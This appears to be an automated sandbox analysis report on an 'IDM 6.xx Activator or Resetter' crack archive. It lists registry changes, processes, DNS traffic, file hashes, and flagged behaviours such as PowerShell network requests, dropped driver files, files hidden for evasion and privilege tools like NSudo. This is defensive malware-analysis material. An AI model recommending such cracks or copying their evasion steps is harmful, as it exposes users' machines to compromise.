Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CacheVersion = "1" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.rar"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp

Files

memory/480-0-0x0000019CC3060000-0x0000019CC3070000-memory.dmp

memory/480-16-0x0000019CC3160000-0x0000019CC3170000-memory.dmp

memory/480-35-0x0000019CCB390000-0x0000019CCB391000-memory.dmp

memory/480-37-0x0000019CCB4D0000-0x0000019CCB4D1000-memory.dmp

memory/480-39-0x0000019CCB4D0000-0x0000019CCB4D1000-memory.dmp

memory/480-40-0x0000019CCB4E0000-0x0000019CCB4E1000-memory.dmp

memory/480-41-0x0000019CCB4E0000-0x0000019CCB4E1000-memory.dmp

memory/480-42-0x0000019CCB4E0000-0x0000019CCB4E1000-memory.dmp

memory/480-43-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-44-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-45-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-46-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-47-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-48-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-49-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-50-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-51-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-52-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-53-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-54-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-55-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-56-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-57-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-58-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-60-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-59-0x0000019CCB500000-0x0000019CCB501000-memory.dmp

memory/480-61-0x0000019CCB510000-0x0000019CCB511000-memory.dmp

memory/480-62-0x0000019CCB510000-0x0000019CCB511000-memory.dmp

memory/480-63-0x0000019CCB520000-0x0000019CCB521000-memory.dmp

memory/480-64-0x0000019CCB580000-0x0000019CCB581000-memory.dmp

memory/480-65-0x0000019CCB570000-0x0000019CCB571000-memory.dmp

memory/3364-74-0x0000026358FB0000-0x0000026358FD0000-memory.dmp

memory/3364-78-0x0000026358F70000-0x0000026358F90000-memory.dmp

memory/3364-80-0x0000026359500000-0x0000026359520000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\W07I75NR\microsoft.windows[1].xml

MD5 6d4f289794a2dafbc77e288c4cf4b08f
SHA1 76b9d65ae2e966768de90478bd4f38d2802fd5db
SHA256 e717849808eb8bc9f9723ca6b1bd9bc3d4c17bf1d80d03c994b7f32a1e86af0e
SHA512 d88973a063e7305e3ba732446274a87b8e0febf64f89b71944c6c64ee675b3ef14fe5304f0a78b95541a276dda5895ccc2ed21e0b29837097f8dd00c8ec0bb9f

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 c88bfd708614b1f2860d02d6714d6792
SHA1 38f37f69c3ec578431892b7f45a06e4d828f6fc9
SHA256 5e87c61af484373617f98f7d8a91733626ffa0b0d966543675f4f7851e8f1bf8
SHA512 11ee934914b048d72ee2621b838785d075e27992ef40f1da446676b05ca3489c9f3f0b60a821076c914d5fa75ee7f968e79d7570df53d85094100de5ee58f477

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133575355469175825.txt

MD5 4c036314f080c753345c8481caf9ae5f
SHA1 c90add2903b9de1bfac12a139e2551af8ec71745
SHA256 ca7a49706055df15b0d7f15795ca9846c18f76f20ce135c039f99096bf164b71
SHA512 2c42b710436c2153a935fdbee7399177deca03c9c877cff99ef2dfa237fc7da5cc0dfbd93129122b268f8eda79f34e41ea5f9c901e5dee35861a2c9dce09bc38

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\95d9a2a97a42f02325559b453ba7f8fe839baa18.tbres

MD5 6a42fb4a4caf54e622ad0f1e1b341aff
SHA1 547c7c0c16c36520720ffbb5049b019044cdf066
SHA256 45b5cf01440127ff6f8227e64059c6d472d1cd7904645ad633b101fe588dc8d7
SHA512 d66412747a5ae171fc0a2198e00474c5e36984c934de20c5e435b6089d25f69fe2fb9f185f5d139b2dd706f1e4d69c55f05e1a6bfecae057edeb110fabf4eb7b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 a0c0ba8c88fe71bdf0898f98b8fb3df8
SHA1 700cc032ab3be50fa9488d24352b4be9588b762b
SHA256 960c439791f2b8dd492b4e8e489a15ed40f086916df71245144e99a0de089fa3
SHA512 38dd28f528409f98e01f2613a9c264431ed81f32fef6eb7bda0c8cefc9a1fa4891baf34a7f11efafdde67f265b5ae935ce00023444abc036a47b881d4049761b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{018d39de-2be3-412b-97a2-a4148fae55b0}\appssynonyms.txt

MD5 06a69ad411292eca66697dc17898e653
SHA1 fbdcfa0e1761ddcc43a0fb280bbcd2743ba8820d
SHA256 2aa90f795a65f0e636154def7d84094af2e9a5f71b1b73f168a6ea23e74476d1
SHA512 ceb4b102309dffb65804e3a0d54b8627fd88920f555b334c3eac56b13eeb5075222d794c3cdbc3cda8bf1658325fdecf6495334e2c89b5133c9a967ec0d15693

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{018d39de-2be3-412b-97a2-a4148fae55b0}\appsglobals.txt

MD5 931b27b3ec2c5e9f29439fba87ec0dc9
SHA1 dd5e78f004c55bbebcd1d66786efc5ca4575c9b4
SHA256 541dfa71a3728424420f082023346365cca013af03629fd243b11d8762e3403e
SHA512 4ba517f09d9ad15efd3db5a79747e42db53885d3af7ccc425d52c711a72e15d24648f8a38bc7e001b3b4cc2180996c6cac3949771aa1c278ca3eb7542eae23fd

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53

MD5 8156dab2a3ae61d357e3ce1d636a178e
SHA1 439539db78cab9461746ff07db3b621273c13b05
SHA256 79cd26ed83f4682e5d57337de810e204d1a516afe6c3bcad870bc1df52f9e8e2
SHA512 33b87ab43f45eb8578605659a495ddedba3b78e1ceeff00d3a969d9c4118d4d6b4e3ac8732ebb148938766602d9278567273cfbd930c7fd1c12cbab9adae162f

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53

MD5 da8fd2b901cc194b9c51ed1d13056044
SHA1 400a11ac8387106d10b5e256693dbf921fb870d2
SHA256 d289fcde2e193a1cc9397044d9e9e53c5e38ed19814126442cd1fee94145cba9
SHA512 27920cc5a4b80e4c0d34b841054ced645477ab637c2a3e41865ba719187eaabb4f1186288e330ffd56f6439283e2eb3f3c1c2d843fd2cc5ddf66d24c193a71b1

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\apps.schema

MD5 1659677c45c49a78f33551da43494005
SHA1 ae588ef3c9ea7839be032ab4323e04bc260d9387
SHA256 5af0fc2a0b5ccecdc04e54b3c60f28e3ff5c7d4e1809c6d7c8469f0567c090bb
SHA512 740a1b6fd80508f29f0f080a8daddec802aabed467d8c5394468b0cf79d7628c1cb5b93cf69ed785999e8d4e2b0f86776b428d4fa0d1afcdf3cbf305615e5030

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\apps.csg

MD5 5475132f1c603298967f332dc9ffb864
SHA1 4749174f29f34c7d75979c25f31d79774a49ea46
SHA256 0b0af873ef116a51fc2a2329dc9102817ce923f32a989c7a6846b4329abd62cd
SHA512 54433a284a6b7185c5f2131928b636d6850babebc09acc5ee6a747832f9e37945a60a7192f857a2f6b4dd20433ca38f24b8e438ba1424cc5c73f0aa2d8c946ff

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\appsconversions.txt

MD5 2bef0e21ceb249ffb5f123c1e5bd0292
SHA1 86877a464a0739114e45242b9d427e368ebcc02c
SHA256 8b9fae5ea9dd21c2313022e151788b276d995c8b9115ee46832b804a914e6307
SHA512 f5b49f08b44a23f81198b6716195b868e76b2a23a388449356b73f8261107733f05baa027f8cdb8e469086a9869f4a64983c76da0dc978beb4ec1cb257532c6b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\settingssynonyms.txt

MD5 003ece80b3820c43eb83878928b8469d
SHA1 790af92ff0eb53a926412e16113c5d35421c0f42
SHA256 12d00eee26e5f261931e51cfa56e04c54405eb32d1c4b440e35bd2b48d5fcf07
SHA512 b2d6d9b843124f5e8e06a35a89e34228af9e05cbfa2ae1fe3d9bc4ddbebda4d279ce52a99066f2148817a498950e37a7f0b73fe477c0c6c39c7016aa647079a5

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\settingsglobals.txt

MD5 bbeadc734ad391f67be0c31d5b9cbf7b
SHA1 8fd5391c482bfbca429aec17da69b2ca00ed81ae
SHA256 218042bc243a1426dd018d484f9122662dba2c44a0594c37ffb3b3d1d0fb454a
SHA512 a046600c7ad6c30b003a1ac33841913d7d316606f636c747a0989425697457b4bc78da6607edd4b8510bd4e9b86011b5bd108a5590a2ba722d44e51633ed784f

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\settingsconversions.txt

MD5 721134982ff8900b0e68a9c5f6f71668
SHA1 fca3e3eb8f49dd8376954b499c20a7b7cad6b0f1
SHA256 2541db95c321472c4cb91864cdfa2f1ed0f0069ac7f9cec86e10822283985c13
SHA512 5d1c305b938e52a82216b3d0cee0eead2dc793fac35da288061942b2bd281fb48c7bd18f5fdaa93a88aa42c88b2a0cce1f0513effb193782670d46164d277a59

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\settings.schema

MD5 ac68ac6bffd26dbea6b7dbd00a19a3dd
SHA1 a3d70e56249db0b4cc92ba0d1fc46feb540bc83f
SHA256 d6bdeaa9bc0674ae9e8c43f2e9f68a2c7bb8575b3509685b481940fda834e031
SHA512 6c3fcce2f73e9a5fc6094f16707109d03171d4a7252cf3cb63618243dbb25adb40045de9be27cad7932fd98205bdaf0f557d282b2ba92118bba26efcf1cd2a02

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f58f86f4-58ee-48cb-bf8d-b44fc23a9a18}\settings.csg

MD5 411d53fc8e09fb59163f038ee9257141
SHA1 cb67574c7872f684e586b438d55cab7144b5303d
SHA256 1844105bb927dbc405685d3bf5546be47fa2fc5846b763c9f2ba2b613ec6bc48
SHA512 67b342c434d8f3a8b9e9ac8a4cbd4c3ef83ddfc450fe7e6ad6f375dba9c8a4977a15a08b49f5ad7644fbde092396e6da08865aa54d399836e5444cb177a33444

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 8911393412534ab71e1ae7b44bc61dc5
SHA1 6fc2f5af924844c6cf1936a9141a2c2f26e434a5
SHA256 c5b5c3d09d7b5a24ad216cb65e897d2c91a0d965dd063cdf3e5c81670c0befed
SHA512 3f37b146b0930ff422a88d2359e3ca85819274d0d96eecd0d01c861f8e51af9328ec07109c4670a0575bb97f120f573a56cda125e6b5bd9700cc1bc785c0b55f

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 adbcfa9246c86d31659fd87bd0bdb1f9
SHA1 63a2731cba12b9f4cc992b711953565275274390
SHA256 513367026c29643ee4b1c6fbe1399642256cd9bb4b83b27c8cb57026283e3a5e
SHA512 58a25954ee21aa87afadbf977112b44173312b7cb3f9b53383a675e760b2f46a821e662f8b906d5ea2e2c96336fdbca0116528609a4007dbfc0468c32733bc6d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json.~tmp

MD5 f8c4f70069e3c70d5aeb79350e4d51a0
SHA1 0ca9b6467c93fc6f1b0c6ad9611c2728c245b9ff
SHA256 6b49268c7ee54819d0e9f3663a68d9d1ebe8f5a23cadcb697841c697c9b5b6b0
SHA512 998e37a856184a80b261888804855d2ecda0ec6a7689034e21cbd432e3b85bef205393dc3aac2a7fa0bf4f785de86ba9020e4e3f21b9261cf4df4f5cd86c332b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 344b79834f10c176549586090edeeda0
SHA1 4c9eef7e50c4e9885ad0a247877bd309a0167735
SHA256 1c6afafb1125f3cc8811f2455a1c1e31ee4e1b8d397d2ddea6e59ea9b8487b04
SHA512 3391905b567d5baa9dfc347d26d1a12dfa5933b4762a87fd9f4cf6bfc5cf47bd726b2196d36ee0cfb7740c91aab6972e90717e96d3ff30acd22efa3a55ce8b93

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 aea02b37f539dcab5432ad3e1f768e12
SHA1 3c1a38f238f41cb9c549b2d2c8e1687b90e87e2e
SHA256 81a3c7842458f96b6780f1dfa1e6383a1a2b4cd4e133587504f527c70d8f9779
SHA512 7ebb79017402e8bca3a9f7fc64b561e48873d24a995444af1d3f6973fc4977be0c5ef9259859fcd4a95c107da4676014a050e530e186b142f7f9ee8a91552790

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 6b7817a6b1011aa892174829df7f5f82
SHA1 bb41e075240e0af1e47aaf2b87fbd28a06298788
SHA256 93fd3564f2db3974b30450562e3146b4020e2acc0f819ca2ced39f5e431632d7
SHA512 cb69263110207e1b390f106f993ab4eebd69b8a8299dc7d0c9a6021ebd7e7ed0167e639f1ef2babca68fc031023689c0bf606f27f79020a078e8ef62d61b3cb9

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-14 02:27

Reported

2024-04-14 02:33

Platform

win7-20240221-en

Max time kernel

289s

Max time network

213s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.rar"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\DRIVERS\SET944.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\idmwfp.sys C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\SET4D94.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File created C:\Windows\system32\DRIVERS\SET58DA.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\SET6CC7.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File created C:\Windows\system32\DRIVERS\SET6CC7.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\SET944.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\idmwfp.sys C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\SET58DA.tmp C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\idmwfp.sys C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\system32\DRIVERS\idmwfp.sys C:\Windows\system32\RUNDLL32.EXE N/A
File created C:\Windows\system32\DRIVERS\SET4D94.tmp C:\Windows\system32\RUNDLL32.EXE N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\idman642build7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\idmBroker.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\Uninstall.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\MediumILStart.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
